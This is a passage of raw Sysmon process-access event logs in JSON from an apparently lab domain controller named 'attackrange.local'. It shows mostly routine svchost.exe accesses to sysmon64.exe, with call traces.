0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010F5E20400}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2796,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 